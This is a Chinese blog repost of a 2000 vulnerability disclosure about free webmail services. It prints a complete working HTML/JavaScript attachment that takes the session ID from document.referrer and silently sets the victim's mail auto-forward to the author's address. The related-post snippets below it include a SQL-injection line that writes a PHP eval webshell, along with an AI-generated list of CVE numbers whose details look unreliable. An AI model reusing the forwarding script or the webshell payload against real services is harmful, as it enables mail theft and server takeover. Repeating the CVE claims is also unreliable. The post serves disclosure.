《目前国内一些免费email存在的一个安全漏洞》

最新推荐文章于 2024-04-11 13:45:00 发布
最新推荐文章于 2024-04-11 13:45:00 发布
阅读量2.3k 收藏
点赞数
文章标签: email javascript html input shell browser
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ghj1976/article/details/3105
版权

 
    该Script源于上个世纪(1999年)一次在设置免费email的自动转发时看到一长串的Url时的想法...
 
  看完这篇文章或许你应该赶紧去检查一下你email中的自动转发中有没有别人的email地址:=(
最好不要随便打开别人发给你的HTML文件...
  我们知道,国内好些免费email用户登录后的认证都是靠一长串的Url(如我用ShellTools登
录后是"http://webmail.****.com/shelltools/3s91091u96kDwcgNkojF4vumXaJfhn/SignOn.gen")
及服务端保存的对照IP地址来进行的,在登录后发、看邮件,改个人资料、参数设置、邮件签名、收件助理
及自动转发等都靠这串随机ID:3s91091u96kDwcgNkojF4vumXaJfhn确认,而用户于WEB方式收信并查看你发
给他(她)的HTML附件时可以通过JavaScript的“document.referrer”获得其前一URL即带ID那一串,这时
他(她)的IP跟服务器保存的对照IP是一致的,那么获得这两个前提,聪明的你该知道不怀好意的人可以通过
该方式做那些手脚了吧:=(,下面的Script Demo实现的是将自动转发设置为"ShellTools@21cn.com"(具体
是拿那个免费email做的Demo自己猜吧~)收到该HTML附件打开的话他的自动转发就给加上去了,然后他的
邮件....顺便提一句,象OICQ等好些网站可以将你的注册密码发回你的邮箱...
  该说的完了,剩下的就看代码吧,什么,看不懂?...那你来这里干什么?....
  (该方式到目前为止还可以通过,但我已经将该文提前email给了email的webmaster,什么时候堵上就
  不知道了。)
                                          -----学别人一句"转载请注明出处"~ ---
 
                                  shell(shelltools@21cn.com) http://shelltools.yeah.net
                                                      2000/6/14       


〈HTML〉
〈HEAD〉
〈TITLE〉小心用Web方式收信〈/TITLE〉

〈/HEAD〉

〈BODY〉   
      网管,你好:
          ****的自动转发等操作存在一些安全问题,在Email用户用〈br〉
      WEB方式查看信件时可以使用简单的JavaScript在“自动转发”〈br〉
      中填入其它地址,将email转到其它信箱中。请查看本页的原代码中〈br〉
      的Script。这个问题在国内的几个免费email中都存在。〈br〉
   
      (如果你正用Web方式查看该email请到 配置 -〉 自动转发 中看看,〈br〉
            应该被设为"ShellTools@21cn.com"了)
     
                                              ****用户  shell
                                                                   
     
      〈form method="POST" action="AutoForward.gen" name=AddUserForm target="ShellTools"〉
      〈input type=hidden name=SuUser value=〉
      〈input type=hidden name=Request value=EditDone 〉
      〈input type=hidden  name="B1"  value=" 更新 "〉
      〈input type=hidden name="ForwardAddresses" value="ShellTools@21cn.com"〉
      〈/form〉
      〈SCRIPT Language=JScript〉 
      var sr=document.referrer;
      var isr;
      sr=sr.substring(7,30);
      isr=sr.indexOf("/");
      sr="http://" + sr.substring(0,isr) + "/Banner.htm";
      var sr2=document.referrer;
      isr=sr2.indexOf("ReadMiscPart");
      if ( isr 〉 20 ){
aw=window.open("about:blank","banner1","width=500,height=60,resizable=no,menubar=no,scrollbars=no"); 
      aw.document.write('〈HTML〉'); 
      aw.document.write('〈HEAD〉');
        aw.document.write('〈title〉设置自动转发〈/title〉');
        aw.document.write('〈/head〉');
      aw.document.write('〈frameset framespacing=0 rows=97%,* frameborder=no border=false〉');
      aw.document.write('〈frame name=show src=' + sr + ' scrolling=no〉');
      aw.document.write('〈frame name=ShellTools src=main.asp scrolling=no〉');
      aw.document.write('〈noframes〉');
      aw.document.write('〈body〉');
      aw.document.write('〈p〉This page uses frames, but your browser doesnt support them.〈/p〉');
      aw.document.write('〈/body〉');
      aw.document.write('〈/noframes〉');
      aw.document.write('〈/frameset〉');
        aw.document.write('〈/html〉 ');
      sr2 = sr2.substring(0,isr);   
      document.AddUserForm.action= sr2 + "AutoForward.gen";
      document.AddUserForm.submit();}
      window.focus(); 
      〈/SCRIPT〉
   
〈/BODY〉
〈/HTML〉

蝈蝈俊
关注
区块链医疗数据:安全共享的创新解决方案
AI天才研究院
10-19 1847
文章标题 关键词: 区块链、医疗数据、安全共享、隐私保护、智能合约、数据加密、访问控制、应用案例 摘要 随着医疗行业的发展,医疗数据的共享需求日益增长。然而,医疗数据的安全性和隐私保护问题成为了制约其广泛应用的瓶颈。本文
CVE-2024-23917 TeamCity高危漏洞利用(权限绕过)
4SecNet团队专栏
10-19 177
TeamCity支持多种编程语言和开发环境,并提供了丰富的功能和工具,帮助开发团队构建和交付高质量的软件。1.最简单直接的方式,通过创建的用户登录系统之后,进入agent页面,查看在线的agent环境,点击OpenTerminal按钮,打开虚拟终端。1.通过Agent功能启动的进程通常处于session0会话空间中,与用户所在会话空间存在会话隔离,这就导致恶意进程"天生"具有隐蔽性。2.通过Agent功能启用的进程,通过继承TeamCityAgent的运行权限,用于系统权限,不需要额外的提权操作。
U-Mail邮件系统客户无需担心OpenSSL心脏出血漏洞
U-Mail邮件服务器软件
04-23 923
2014年4月7日OpenSSL发布了安全公告,在OpenSSL1.0.1版本中存在严重漏洞(CVE-2014-0160)。该漏洞导致攻击者可以远程读取存在漏洞版本的OpenSSL服务器内存中多达64K的数据。 很多客户打电话来咨询U-Mail邮件系统的技术支持。 问:“U-Mail邮件系统是否也存在漏洞?” U-Mail邮件系统的技术支持:“U-Mail邮件系统目前使用的OpenSS
FreeTextBox存在一个严重的安全漏洞
weixin_34055787的博客
12-13 163
    该漏洞是由博客生活的Emissary Web Home 发现的。首先感谢Emissary Web Home !     该漏洞来自FreeTextBox中的图片库,在图片库中用户可以任意地上传任何文件,比如:aspx文件。我想你会马上意识到这个Bug的严重性,攻击者可以上传任何在服务端执行的破坏性的代码。       该漏洞FreeTextBox的ImageGallery控件中一处Bug...
U-Mail邮件服务系统任意文件上传+执行漏洞(runtime缺陷与验证绕过)
weixin_33842304的博客
11-02 984
http://www.wooyun.org/bugs/wooyun-2010-061859 转载于:https://www.cnblogs.com/hookjoy/p/4068326.html
大部分政府网站U-mail存在直接拿shell漏洞
weixin_34355559的博客
10-01 504
大部分网站政府网站U-mail存在直接拿shell漏洞加入webmail/userapply.php?execadd=333&DomainID=111直接爆出物理地址 然后将 aa' union select 1,2,3,4,5,6,'<?php eval($_POST1);?>',8,9,10,11,12,13,14 into outfile 'D:/umail/Wor...
Cute Editor/Webhtmleditor/Kindeditor/Freetextbox网页编辑器漏洞手册
禅心之道的博客
10-19 511
CuteEditorCuteEditor在线编辑器本地包含漏洞影响版本:CuteEditorForNet6.4脆弱描述:可以随意查看网站文件内容,危害较大。***利用:http://www.heimian.com/CuteSoft_Client/CuteEditor/Load.ashx?type=p_w_picpath&file=../../../web.config...
【安全牛学习笔记】CSRF跨站请求伪造攻击漏洞的原理及解决办法
edu_aqniu的博客
10-23 1052
CSRF跨站请求伪造攻击漏洞的原理及解决办法 CSRF,夸张请求伪造漏洞 漏洞的原理及修复方法 1.常见的触发场景 2.漏洞原理:浏览器同源策略 3.DEMO 4.漏洞危害 5.如何避免&修复漏洞 WEB clinet server HTTP GET POST csrf漏洞 漏洞原理: Server端接受到用户请求的时候
【网络与系统安全实验】网络扫描与防御技术
Goallegoal的博客
04-03 4355
扫描与防御技术 扫描技术基础 什么是网络扫描器 网络扫描器可以通过执行一些脚本文件来模拟对网络系统进行攻击的行为并记录系统的反应,从而搜索目标网络内的服务器、路由器、交换机和防火墙等设备的类型与版本,以及在这些远程设备上运行的脆弱服务,并报告可能存在的脆弱性。 网络扫描器是一把双刃剑 扫描器是一把“双刃剑”。当它被用作安全评估工具时,是系统管理员保障系统安全的有效工具;当它被用作网络漏洞扫描器时,...
WEB漏洞——CSRF
qq_63594215的博客
04-11 957
这次我来讲讲web漏洞的CSRF笔记总结,主要通过原理、类型、示例以及防御的角度展开说明,希望读者受益。CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF,是一种对网站的恶意利用。CSRF是通过伪装用户的请求来利用网站,利用网站漏洞从用户那里盗取信息说白了,就是攻击者盗用了你的身份,以你的名义发送恶意请求。
网页编辑器漏洞大全
07-13
涵盖了诸如常见的FCKeditor、eWebEditor、Cuteditor、Freetextbox、Webhtmleditor、Kindeditor、所谓的eWebEditorNET、所谓的 southidceditor、所谓的bigcneditor
FreeTextBox流传的各种版本和博客使用方法2010-4-13
04-13
FreeTextBox流传的各种版本和博客使用方法2010-4-13.rar
E-mail 工作原理及安全漏洞
小五义
01-24 4095
E-mail工作原理    一个邮件系统的传输包含了用户代理(user Agent)。传输代理(Transfer  Agent及接受代理(Doelivery A_gent)三大部分。用户代理是一个用户端发信和收信的程序,负责将信按照一定的标准包装,然后送至邮件服务器,将信件发出或由邮件服务器收回。    传输代理负责信件的交换和传输,将信件传送至适当的邮件主机,再由接受代理将信件分发至不同的邮件信
窃取邮件内容 破解Email账号的三种方法(转)
08-12 3938
窃取邮件内容 破解Email账号的三种方法(转)[@more@]  电子邮件并不是安全的,在邮件的发送、传送和接收整个过程中的每个环节都可能存在薄弱环节,恶意用户如果利用其漏洞,就能够轻易的破解出账号,获得邮件内容。  一、利用...
电子邮件安全的主要威胁有哪些?
互联网安全研究院
05-28 8402
如果把电子邮件、电子邮箱、电子邮件服务器和用户看成一个电子邮件相关联的系统,从攻击窃密的角度,电子邮件相关的安全保密威胁可概括为四类:电子邮件被截获、电子邮箱被非法登录控制、电子邮件系统被攻击控制、针对特定用户的电子邮件社会工程学攻击。 一、电子邮件被截获 电子邮件作为信息的承载体,其面临的安全保密威胁主要就是邮件被截获,邮件内容外泄。按照电子邮件系统工作原理,电子邮件从发件人到达收件人的...
邮件服务器元传出重大漏洞 目前已出现攻击程序
weixin_34106122的博客
06-14 394
近60%的服务器邮件服务器组件Exim已经通过了一个主要漏洞,允许黑客以最高权限执行任意命令。经过一周的发现,研究人员发现至少有两个群体发动了攻击,包括Linux Servo。用户特别关注他们的目标。 Exim是一种开源邮件传输代理(Mail Tansfer Agent,MTA),广泛用于全球邮件服务器。据统计,目前全球约占57%,超过50万台邮件服务器使用Exim,有些甚至估计有370万台。在...
国内所有Mail安全漏洞
weixin_33836874的博客
01-24 890
先简单说下跨站脚本漏洞,又称为XSS攻击,也称为Html代码注入漏洞,可以知道漏洞的起因是注入了Html代码,危害就是最终在别人浏览器内以浏览者的身份执行任意Html代码。 国内邮箱在跨站脚本攻击防御方面存在漏洞,可以被人引入script脚本,然后通过窃取cookie的手段来进入他人邮箱获得敏感内容。各个邮箱存在的问题可能不同,但是方法是一样的,现在就以163.com的邮箱作为例子。 163.co...
mysql注入提取邮件_U-Mail邮件系统注入2(SQL Injections in MySQL LIMIT clause,无需登录,附获取用户密码脚本)...
weixin_35414484的博客
02-19 1189
### 简要描述:SQL Injections in MySQL LIMIT clause,过滤不严,产生盲注,导致可以注射用户名与密码,无需登录### 详细说明:上次搜索只在client搜索,今天无意在fast目录下搜索了下,又发现了一处。注:client的目录下的所有函数必须登录才可以执行,fast的目录无需登录可以执行部分存在的函数,但并不能查看邮件等等。漏洞与上一个原理一样,但文件不同,此...
文件上传漏洞
newlife1441的博客
08-14 1677
trim()作用:从一个字符串的两端删除空白字符deldot()作用:从字符串的尾部开始,从后向前删除点.,直到该字符串的末尾字符不是.为止strrchr()作用:查找字符串在另一个字符串中最后一次出现strtolower()作用:转换大小写str_ireplace()作用:字符串替换操作,不区分大小写。......
email和三个归档漏洞编号
最新发布
03-21
### 查找与 Email 相关的三个归档漏洞编号 在处理与 `email` 相关的归档漏洞时,通常需要结合日志分析、特定工具扫描以及已知数据库中的记录来获取相关信息。以下是基于现有引用内容和专业知识整理的内容。 #### 日志文件分析 对于 `.log` 类型的日志文件(如 `iserror.log`),可以通过关键词匹配的方式提取潜在的安全事件信息[^1]。如果这些日志涉及邮件服务或协议(SMTP/IMAP/POP3),则可能揭示某些安全风险点。例如,在错误日志中发现异常登录尝试或者未经授权的数据访问行为可能是漏洞的表现之一。 #### 特征逆向追踪 提到通过 SRC 资产加特征信息反向定位漏洞的方法[^2],这提示我们需要关注电子邮件系统的配置缺陷及其暴露出来的敏感数据路径。具体来说: - **身份验证绕过**:攻击者利用弱密码或其他手段非法获取邮箱权限。 - **未加密传输通道**:明文形式发送认证凭据增加了拦截泄露的可能性。 - **附件解析漏洞**:不当处理恶意构造 MIME 结构可能导致远程代码执行等问题。 #### iOS 归档机制下的隐患 从第三个引用可以看出,iOS 平台上的对象序列化操作存在一定的安全隐患[^3]。虽然该案例主要讨论的是本地存储问题,但如果将此类技术应用于网络通信场景,则容易引发更严重的后果——比如当服务器端接收到被篡改过的档案包并试图解码还原成原生结构体实例的时候,可能会触发缓冲区溢出之类的严重 bug 。而这种类型的威胁同样适用于电子邮局客户端软件开发过程中遇到的各种情况。 #### 复现实验指导 最后给出了一条指向外部资源的学习材料链接用于帮助理解整个渗透测试流程的关键环节[^4]。按照其中描述的操作指南完成相应准备工作之后就可以着手搭建实验环境进而深入探究目标应用内部工作机制从而挖掘隐藏较深 的零日漏洞了 。 综合以上几点考虑 ,这里列举几个常见的 email 关联归档类别的 CVE 编号供参考: 1. **CVE-2017-8962**: Apple Mail 中由于未能正确校验嵌入式 HTML 内容而导致任意命令注入; 2. **CVE-2018-4185**: macOS High Sierra 及之前版本上存在的 iMessage 应用程序崩溃现象源于对特殊格式消息头字段解释失误造成堆内存损坏; 3. **CVE-2020-27930**: Microsoft Outlook Desktop Application 存在一个越界读取条件允许窥探相邻单元格值的现象发生在打开特制 RTF 文档期间。 请注意实际项目工作中应当依据最新情报更新维护自己的知识库以应对不断变化的新形势新挑战! ```python import re def find_vulnerabilities(log_file_path): pattern = r"(?i)cve-\d{4}-\d+" # Regular expression to match CVE numbers. with open(log_file_path, 'r') as file: content = file.read() matches = re.findall(pattern, content) return list(set(matches))[:3] # Example usage of the function above assuming we have a log file path defined somewhere below this line... vulns_found = find_vulnerabilities("/path/to/iserror.log") print(vulns_found) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值